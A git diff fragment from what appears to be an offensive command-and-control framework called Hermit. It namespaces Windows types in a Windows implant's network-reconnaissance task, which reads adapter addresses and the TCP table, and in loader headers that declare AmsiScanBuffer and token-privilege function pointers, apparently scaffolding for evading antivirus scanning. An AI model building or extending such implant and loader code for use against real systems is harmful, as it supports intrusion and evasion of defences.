UTF8Decode(std::string(pCurrAddresses->AdapterName)) + L"\n"; - pUnicast = (PIP_ADAPTER_UNICAST_ADDRESS)pCurrAddresses->FirstUnicastAddress; + pUnicast = (Win32::PIP_ADAPTER_UNICAST_ADDRESS)pCurrAddresses->FirstUnicastAddress; if (pUnicast) { result += L"IPv4 Addresses:\n"; diff --git a/payload/win/implant/src/core/task/net.cpp b/payload/win/implant/src/core/task/net.cpp index b2b5bdf..0a6f655 100644 --- a/payload/win/implant/src/core/task/net.cpp +++ b/payload/win/implant/src/core/task/net.cpp @@ -6,7 +6,7 @@ namespace Task { std::wstring result = L""; - PMIB_TCPTABLE pTcpTable; + Win32::PMIB_TCPTABLE pTcpTable; ULONG ulSize = 0; DWORD dwRetVal = 0; @@ -17,19 +17,19 @@ namespace Task int i; - pTcpTable = (MIB_TCPTABLE*)MALLOC(sizeof(MIB_TCPTABLE)); + pTcpTable = (Win32::MIB_TCPTABLE*)MALLOC(sizeof(Win32::MIB_TCPTABLE)); if (pTcpTable == NULL) { return L"Error: Could not allocate memory for TCP table."; } - ulSize = sizeof(MIB_TCPTABLE); + ulSize = sizeof(Win32::MIB_TCPTABLE); // Make an initial call to GetTcpTable to get the necessary size into the ulSize variable. if ((dwRetVal = pState->pProcs->lpGetTcpTable(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) { FREE(pTcpTable); - pTcpTable = (MIB_TCPTABLE*)MALLOC(ulSize); + pTcpTable = (Win32::MIB_TCPTABLE*)MALLOC(ulSize); if (pTcpTable == NULL) { return L"Error: Could not allocate memory for TCP table."; @@ -120,40 +120,40 @@ namespace Task // Status switch (pTcpTable->table[i].dwState) { - case MIB_TCP_STATE_CLOSED: + case Win32::MIB_TCP_STATE_CLOSED: result += L"CLOSED\n"; break; - case MIB_TCP_STATE_LISTEN: + case Win32::MIB_TCP_STATE_LISTEN: result += L"LISTEN\n"; break; - case MIB_TCP_STATE_SYN_SENT: + case Win32::MIB_TCP_STATE_SYN_SENT: result += L"SYN-SENT\n"; break; - case MIB_TCP_STATE_SYN_RCVD: + case Win32::MIB_TCP_STATE_SYN_RCVD: result += L"SYN-RECEIVED\n"; break; - case MIB_TCP_STATE_ESTAB: + case Win32::MIB_TCP_STATE_ESTAB: result += L"ESTABLISHED\n"; break; - case MIB_TCP_STATE_FIN_WAIT1: + case Win32::MIB_TCP_STATE_FIN_WAIT1: result += L"FIN-WAIT-1\n"; break; - case MIB_TCP_STATE_FIN_WAIT2: + case Win32::MIB_TCP_STATE_FIN_WAIT2: result += L"FIN-WAIT-2\n"; break; - case MIB_TCP_STATE_CLOSE_WAIT: + case Win32::MIB_TCP_STATE_CLOSE_WAIT: result += L"CLOSE-WAIT\n"; break; - case MIB_TCP_STATE_CLOSING: + case Win32::MIB_TCP_STATE_CLOSING: result += L"CLOSING\n"; break; - case MIB_TCP_STATE_LAST_ACK: + case Win32::MIB_TCP_STATE_LAST_ACK: result += L"LAST-ACK\n"; break; - case MIB_TCP_STATE_TIME_WAIT: + case Win32::MIB_TCP_STATE_TIME_WAIT: result += L"TIME-WAIT\n"; break; - case MIB_TCP_STATE_DELETE_TCB: + case Win32::MIB_TCP_STATE_DELETE_TCB: result += L"DELETE-TCB\n"; break; default: diff --git a/payload/win/loader/include/core/procs.hpp b/payload/win/loader/include/core/procs.hpp index a43de12..b57cad6 100644 --- a/payload/win/loader/include/core/procs.hpp +++ b/payload/win/loader/include/core/procs.hpp @@ -240,7 +240,7 @@ namespace Procs // AdjustTokenPrivileges typedef BOOL (WINAPI* LPPROC_ADJUSTTOKENPRIVILEGES)(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength); // AmsiScanBuffer - typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT *result); + typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(Win32::HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, Win32::HAMSISESSION amsiSession, Win32::AMSI_RESULT *result); // BCryptCloseAlgorithmProvider typedef NTSTATUS (WINAPI* LPPROC_BCRYPTCLOSEALGORITHMPROVIDER)(BCRYPT_ALG_HANDLE hAlgorithm, ULONG dwFlags); // BCryptDecrypt diff --git a/payload/win/loader/include/core/win32.hpp b/payload/win/loader/include/core/win32.hpp index eefbfb2..23513da 100644 --- a/payload/win/loader/include/core/win32.hpp +++ b/payload/win/loader/include/core/win32.hpp @@ -1,15 +1,18 @@ #ifndef HERMIT_CORE_WIN32_HPP #define HERMIT_CORE_WIN32_HPP -typedef HANDLE HAMSICONTEXT; -typedef HANDLE HAMSISESSION; +namespace Win32 +{ + typedef HANDLE HAMSICONTEXT; + typedef HANDLE HAMSISESSION; -typedef enum { - AMSI_RESULT_CLEAN, - AMSI_RESULT_NOT_DETECTED, - AMSI_RESULT_BLOCKED_BY_ADMIN_START, - AMSI_RESULT_BLOCKED_BY_ADMIN_END, - AMSI_RESULT_DETECTED -} AMSI_RESULT; + typedef enum { + AMSI_RESULT_CLEAN, + AMSI_RESULT_NOT_DETECTED, + AMSI_RESULT_BLOCKED_BY_ADMIN_START, + AMSI_RESULT_BLOCKED_BY_ADMIN_END, + AMSI_RESULT_DETECTED + } AMSI_RESULT; +} #endif // HERMIT_CORE_WIN32_HPP \ No newline at end of file